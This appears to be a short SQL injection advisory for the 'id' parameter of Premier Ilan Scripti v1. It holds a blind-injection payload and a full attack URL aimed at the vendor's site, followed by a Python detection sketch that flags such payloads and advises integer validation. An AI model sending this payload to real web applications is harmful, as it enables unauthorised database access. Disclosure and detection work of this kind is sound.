===========================================================================================  
# Exploit Title: Premier Ilan Scripti - "id" SQL Inj.  
# Dork: N/A  
# Date: 29-06-2019  
# Exploit Author: Mehmet EMIROGLU  
# Vendor Homepage: http://v1.ilanscripti.org/  
# Software Link: http://v1.ilanscripti.org/  
# Version: v1  
# Category: Webapps  
# Tested on: Wamp64, Windows  
# CVE: N/A  
# Software Description:  
===========================================================================================  
# POC - SQLi  
# Parameters : id  
# Attack Pattern :  
%27/**/RLIKE/**/(case/**/when/**//**/8885330=8885330/**/then/**/0x74657374696E70757476616C7565/**/else/**/0x28/**/end)/**/and/**/'%'='  
# GET Method :  
http://v1.ilanscripti.org/kiralik-urunler-kategorino-6183.html?sayfa=kategorigoruntule&fiyat1=8100714&fiyat2=3695287&arama=Aramayı Daralt&durumu=0&sehir=0&ilce=0&sm=0&id=6183%27/**/RLIKE/**/(case/**/when/**//**/8885330=8885330/**/then/**/0x74657374696E70757476616C7565/**/else/**/0x28/**/end)/**/and/**/'%'='  
===========================================================================================
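
# Detection sketch (added example, not part of the original advisory or the vendor's code): flags requests whose "id" value is not a plain number and reports which traits of the pattern above it carries. The host shop.example, the shortened query string and all function names are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)      # /**/ standing in for a space
SQL_TOKEN = re.compile(
    r"\b(?:rlike|regexp|case|when|then|else|union|select)\b|\b0x[0-9a-f]+", re.I)
CONST_COMPARE = re.compile(r"\b(\d+)\s*=\s*\1\b")    # e.g. 8885330=8885330


def decode(value, rounds=3):
    """Undo up to `rounds` extra layers of percent-encoding."""
    for _ in range(rounds):
        once = unquote(value)
        if once == value:
            break
        value = once
    return value


def inspect_id(url, param="id"):
    """Return findings for `param` in `url`; an empty list means a plain numeric id."""
    findings = []
    for key, raw in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if key != param:
            continue
        value = decode(raw)
        if re.fullmatch(r"[0-9]+", value):
            continue
        findings.append("non-numeric id")
        if "'" in value or '"' in value:
            findings.append("quote character")
        if INLINE_COMMENT.search(value):
            findings.append("inline comment as whitespace")
        # Replace comments with spaces so keywords are matched as separate words.
        flat = re.sub(r"\s+", " ", INLINE_COMMENT.sub(" ", value)).lower()
        if SQL_TOKEN.search(flat):
            findings.append("sql keyword or hex literal")
        if CONST_COMPARE.search(flat):
            findings.append("constant comparison")
    return findings


# Constructed request URLs: placeholder host, shortened query, id value as listed in the advisory.
BENIGN = "http://shop.example/kiralik-urunler-kategorino-6183.html?sayfa=kategorigoruntule&sm=0&id=6183"
PROBE = BENIGN + ("%27/**/RLIKE/**/(case/**/when/**//**/8885330=8885330/**/then/**/"
                  "0x74657374696E70757476616C7565/**/else/**/0x28/**/end)/**/and/**/'%'='")
```

# The same numeric-only rule belongs in the application itself: cast or validate "id" as an integer and bind it as a query parameter, so that log detection is a second line of defence rather than the only one.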